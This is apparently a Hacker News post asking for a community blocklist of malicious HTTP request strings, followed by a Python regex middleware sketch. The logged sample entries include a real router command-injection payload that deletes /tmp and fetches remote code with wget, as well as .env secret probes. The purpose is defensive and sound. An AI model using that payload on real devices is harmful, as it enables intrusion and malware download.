Ask HN: Can we collaborate on an IP Address or Regex blacklist?

Hear me out.

I've recently started logging pings to my services. A LOT of servers ping me constantly, checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this:

{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" },

{ "offense": ".env", "ipAddress": "52.224.55.198" },

{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" }

Maybe we don't filter by IP address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy, rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

Like an 'ad blocklist' we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a GitHub.


Comments URL: https://news.ycombinator.com/item?id=26719964

Points: 11

# Comments: 16
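
A sketch of the string/regex blocklist middleware the post asks about, as an added example that is not part of the original post. The rule names, the three patterns (built only from the sample log entries above) and the `BlocklistMiddleware` class are assumptions; it also decodes percent-encoding before matching, which goes beyond the plain substring check the post describes.

```python
import re
from urllib.parse import unquote_plus

# Constructed rules, derived only from the three sample entries in the post.
# Anchoring on path separators keeps "/docs/environment" from matching ".env".
RULES = [
    ("dotenv-probe", re.compile(r"(^|/)\.env([./?]|$)", re.I)),
    ("boaform-login", re.compile(r"(^|/)boaform/admin/formlogin", re.I)),
    ("setup-cgi-syscmd", re.compile(r"(^|/)setup\.cgi\?.*\btodo=syscmd\b", re.I)),
]


def normalize(target, max_rounds=3):
    """Percent-decode up to max_rounds times so %2eenv and %252eenv reduce to .env."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def match_rule(target):
    """Return the name of the first rule matching the request target, else None."""
    text = normalize(target)
    for name, pattern in RULES:
        if pattern.search(text):
            return name
    return None


class BlocklistMiddleware:
    """WSGI wrapper: answer 403 for blocklisted targets, pass everything else on."""

    def __init__(self, app, hits=None):
        self.app = app
        self.hits = hits if hits is not None else []  # same keys as the post's JSON

    def __call__(self, environ, start_response):
        target = environ.get("PATH_INFO", "")
        if environ.get("QUERY_STRING"):
            target += "?" + environ["QUERY_STRING"]
        rule = match_rule(target)
        if rule is None:
            return self.app(environ, start_response)
        self.hits.append({"offense": target, "ipAddress": environ.get("REMOTE_ADDR"), "rule": rule})
        start_response("403 Forbidden", [("Content-Type", "text/plain")])
        return [b"Forbidden\n"]
```

Each blocked request is appended to `hits` in the same shape as the dataset in the post, so new rules can be reviewed against what they actually caught before being shared.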


